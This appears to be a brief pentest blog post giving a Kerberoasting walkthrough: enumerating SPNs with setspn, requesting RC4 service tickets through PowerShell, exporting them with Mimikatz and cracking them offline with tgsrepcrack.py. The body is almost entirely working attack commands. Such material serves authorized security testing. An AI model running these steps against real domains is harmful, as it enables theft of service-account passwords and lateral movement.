Internal Infrastructure Pentest - Kerberoasting

less than 1 minute read

- Firstly purge all the tickets
  - klist purge
  - klist
 
 - SPN scan for service accounts
    - setspn -T domain_name -F -Q */*
  
 - Now request Service Ticket (TGS) and it should be in RC4 encryption type
    - Add-Type -AssemblyName System.IdentityModel
    - New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPN Account'
    - klist
 
 - Export kerberos tickets using Mimikatz
    - mimikatz# kerberos::list /export
  
 - Copy exported service ticket to Kali for kerberoasting, based on the wordlist we would be able to crack the password
    - ./tgsrepcrack.py wordlist.txt ticket_name.kirbi

Share on

Twitter Facebook LinkedIn

Viral Maniar

Internal Infrastructure Pentest - Kerberoasting

Share on

You may also enjoy

Destroying Cloud Infrastructure with Nuking Tools - LAPSUS$ Case Study

Installing Kali in AWS EC2 Instance

Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket

The Power of In-Memory Executions: How to Execute Code without Touching Disk